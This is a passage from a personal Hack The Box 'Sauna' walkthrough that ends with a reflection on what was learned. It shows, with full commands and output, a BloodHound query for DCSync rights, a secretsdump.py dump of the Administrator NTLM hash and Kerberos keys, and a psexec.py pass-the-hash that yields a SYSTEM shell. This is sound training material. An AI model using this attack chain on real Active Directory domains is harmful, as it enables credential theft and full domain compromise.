/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
                                        Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0>

Then upload the Zip File into Bloudhound

To identify users with DCSync rights, we can use a BloodHound query. DCSync privileges allow an account to simulate the Domain Controller and request password hashes for other users — a high-value escalation vector.

In BloodHound, this query is expressed in Cypher and will return all accounts that have the ability to perform a DCSync attack:

MATCH p=()-[:GetChanges|GetChangesAll|GetChangesInFilteredSet]->(:Domain) Return p

Now that we’ve identified an account with DCSync privileges, we can leverage this to dump password hashes directly from the Domain Controller.

To do this, we can use secretsdump.py from the Impacket suite. Since DCSync rights allow us to replicate directory data, we can request the NTLM hashes for high-value accounts — including the Administrator account.

jbrown@Jabaris-MacBook-Pro examples % python3 secretsdump.py egotistical-bank/[email protected] -just-dc-user Administrator
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
[*] Cleaning up... 
jbrown@Jabaris-MacBook-Pro examples %

Now that we’ve obtained the Administrator NTLM hash, we can perform a Pass-the-Hash attack to authenticate without needing the plaintext password.

Using psexec.py from the Impacket suite, we can pass the Administrator hash directly to the target and attempt to spawn a SYSTEM-level shell.

jbrown@Jabaris-MacBook-Pro examples % psexec.py [email protected] cmd.exe -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Requesting shares on 10.129.4.62.....
[*] Found writable share ADMIN$
[*] Uploading file AteBLZgF.exe
[*] Opening SVCManager on 10.129.4.62.....
[*] Creating service yYmd on 10.129.4.62.....
[*] Starting service yYmd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

C:\Windows\system32> cd ../
C:\Windows> cd ../
C:\> cd Users
C:\Users> cd Administrator
C:\Users\Administrator> dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC
 Directory of C:\Users\Administrator
01/25/2020  01:05 PM    <DIR>          .
01/25/2020  01:05 PM    <DIR>          ..
01/23/2020  03:11 PM    <DIR>          3D Objects
01/23/2020  03:11 PM    <DIR>          Contacts
07/14/2021  02:35 PM    <DIR>          Desktop
01/23/2020  03:11 PM    <DIR>          Documents
01/23/2020  03:11 PM    <DIR>          Downloads
01/23/2020  03:11 PM    <DIR>          Favorites
01/23/2020  03:11 PM    <DIR>          Links
01/23/2020  03:11 PM    <DIR>          Music
01/23/2020  03:11 PM    <DIR>          Pictures
01/23/2020  03:11 PM    <DIR>          Saved Games
01/23/2020  03:11 PM    <DIR>          Searches
01/23/2020  03:11 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   7,796,477,952 bytes free
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC
 Directory of C:\Users\Administrator\Desktop
07/14/2021  02:35 PM    <DIR>          .
07/14/2021  02:35 PM    <DIR>          ..
02/22/2026  07:05 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,796,477,952 bytes free
C:\Users\Administrator\Desktop> type root.txt
****ROTFLAGHERE*******
C:\Users\Administrator\Desktop>

And that concludes the Sauna machine from Hack The Box.

This box was a great exercise in understanding how small pieces of information — such as exposed employee names — can evolve into full domain compromise when combined with proper enumeration and protocol abuse. From AS‑REP Roasting to DCSync and Pass‑the‑Hash, each step reinforced the importance of thinking through attack paths instead of relying solely on automated tooling.

Working through this machine helped solidify my understanding of:

• Kerberos authentication flow
• The impact of disabled preauthentication
• Offline hash cracking
• BloodHound attack path analysis
• Active Directory replication abuse (DCSync)

More importantly, it forced me to slow down, research what I didn’t fully understand, and explain each concept in my own words. That process alone has been just as valuable as completing the box itself.

On to the next one.